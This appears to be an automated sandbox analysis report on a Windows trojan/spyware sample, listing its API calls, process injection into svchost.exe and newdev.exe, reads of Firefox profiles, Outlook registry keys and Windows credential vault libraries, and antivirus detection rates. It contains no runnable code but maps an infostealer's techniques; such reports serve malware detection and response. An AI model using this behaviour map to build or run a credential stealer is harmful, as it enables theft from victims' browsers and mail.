Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72CC0 NtQueryVirtualMemory,	2_2_03B72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72C00 NtQueryInformationProcess,	2_2_03B72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72C70 NtFreeVirtualMemory,	2_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72C60 NtCreateKey,	2_2_03B72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73090 NtSetValueKey,	2_2_03B73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73010 NtOpenDirectoryObject,	2_2_03B73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B739B0 NtGetContextThread,	2_2_03B739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73D10 NtOpenProcessToken,	2_2_03B73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73D70 NtOpenThread,	2_2_03B73D70

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000DA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_000DA1EF

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000C8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_000C8310

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000D51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_000D51BD

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_0007E6A0	0_2_0007E6A0
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_0009D975	0_2_0009D975
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_0007FCE0	0_2_0007FCE0
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000921C5	0_2_000921C5
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000A62D2	0_2_000A62D2
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000F03DA	0_2_000F03DA
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000A242E	0_2_000A242E
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000925FA	0_2_000925FA
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000CE616	0_2_000CE616
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000866E1	0_2_000866E1
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000A878F	0_2_000A878F
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00088808	0_2_00088808
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000A6844	0_2_000A6844
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000F0857	0_2_000F0857
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000D8889	0_2_000D8889
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_0009CB21	0_2_0009CB21
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000A6DB6	0_2_000A6DB6
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00086F9E	0_2_00086F9E
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00083030	0_2_00083030
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00093187	0_2_00093187
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_0009F1D9	0_2_0009F1D9
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00071287	0_2_00071287
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00091484	0_2_00091484
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00085520	0_2_00085520
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00097696	0_2_00097696
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00085760	0_2_00085760
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00091978	0_2_00091978
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000A9AB5	0_2_000A9AB5
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00091D90	0_2_00091D90
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_0009BDA6	0_2_0009BDA6
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000F7DDB	0_2_000F7DDB
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_0007DF00	0_2_0007DF00
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00083FE0	0_2_00083FE0
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_014B3610	0_2_014B3610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004185A3	2_2_004185A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E0D7	2_2_0040E0D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004010E0	2_2_004010E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E0E3	2_2_0040E0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402240	2_2_00402240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040441A	2_2_0040441A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402540	2_2_00402540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FD5A	2_2_0040FD5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FD63	2_2_0040FD63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042ED93	2_2_0042ED93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402EF0	2_2_00402EF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF83	2_2_0040FF83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041678E	2_2_0041678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416793	2_2_00416793
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF93	2_2_0040DF93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C003E6	2_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA352	2_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC02C0	2_2_03BC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF41A2	2_2_03BF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C001AA	2_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF81CC	2_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30100	2_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC8158	2_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3C7C0	2_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64750	2_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5C6E0	2_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C00591	2_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEE4F6	2_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4420	2_2_03BE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF2446	2_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF6BD7	2_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFAB40	2_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0A9A6	2_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B268B8	2_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E8F0	2_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4A840	2_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B42840	2_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBEFA0	2_2_03BBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4CFE0	2_2_03B4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32FC8	2_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B60F30	2_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE2F30	2_2_03BE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B82F28	2_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB4F40	2_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52E90	2_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFCE93	2_2_03BFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFEEDB	2_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFEE26	2_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40E59	2_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B58DBF	2_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3ADE0	2_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDCD1F	2_2_03BDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4AD00	2_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0CB5	2_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30CF2	2_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40C00	2_2_03B40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B8739A	2_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF132D	2_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2D34C	2_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B452A0	2_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE12ED	2_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5B2C0	2_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4B1B0	2_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0B16B	2_2_03C0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2F172	2_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7516C	2_2_03B7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF70E9	2_2_03BF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFF0E0	2_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEF0CC	2_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B470C0	2_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFF7B0	2_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF16CC	2_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B85630	2_2_03B85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C095C3	2_2_03C095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDD5B0	2_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF7571	2_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFF43F	2_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B31460	2_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5FB80	2_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB5BF0	2_2_03BB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7DBF9	2_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFB76	2_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDDAAC	2_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B85AA0	2_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE1AA3	2_2_03BE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEDAC6	2_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB3A6C	2_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFA49	2_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF7A46	2_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD5910	2_2_03BD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B49950	2_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5B950	2_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B438E0	2_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAD800	2_2_03BAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFFB1	2_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B41F92	2_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B03FD2	2_2_03B03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B03FD5	2_2_03B03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFF09	2_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B49EB0	2_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5FDC0	2_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF7D73	2_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF1D5A	2_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B43D40	2_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFCF2	2_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB9C32	2_2_03BB9C32

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B87E54 appears 111 times
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: String function: 00090AE3 appears 70 times
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: String function: 00077DE1 appears 35 times
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: String function: 00098900 appears 42 times

Source: 25IvlOVEB1.exe, 00000000.00000003.2181914007.0000000003FAD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 25IvlOVEB1.exe
Source: 25IvlOVEB1.exe, 00000000.00000003.2185171746.0000000003E53000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 25IvlOVEB1.exe

Source: 25IvlOVEB1.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@7/6

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000DA06A GetLastError,FormatMessageW,

0_2_000DA06A

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000C81CB AdjustTokenPrivileges,CloseHandle,		0_2_000C81CB
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000C87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_000C87E1

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000DB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_000DB333

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000EEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_000EEE0D

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000DC397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_000DC397

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_00074E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00074E89

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

File created: C:\Users\user\AppData\Local\Temp\aut8CBF.tmp

Jump to behavior

Source: 25IvlOVEB1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: newdev.exe, 00000008.00000003.3161436782.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4049026110.0000000000A22000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4049026110.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4049026110.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000008.00000003.3161319470.00000000009F7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 25IvlOVEB1.exe	Virustotal: Detection: 46%
Source: 25IvlOVEB1.exe	ReversingLabs: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\25IvlOVEB1.exe "C:\Users\user\Desktop\25IvlOVEB1.exe"
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\25IvlOVEB1.exe"
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	Process created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"
Source: C:\Windows\SysWOW64\newdev.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\25IvlOVEB1.exe"	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	Process created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\newdev.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\newdev.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 25IvlOVEB1.exe

Static file information: File size 1170432 > 1048576

Source: 25IvlOVEB1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 25IvlOVEB1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 25IvlOVEB1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 25IvlOVEB1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 25IvlOVEB1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 25IvlOVEB1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 25IvlOVEB1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CsyVZPSRWzlUG.exe, 00000007.00000002.4049565934.0000000000CEE000.00000002.00000001.01000000.00000005.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050496147.0000000000CEE000.00000002.00000001.01000000.00000005.sdmp
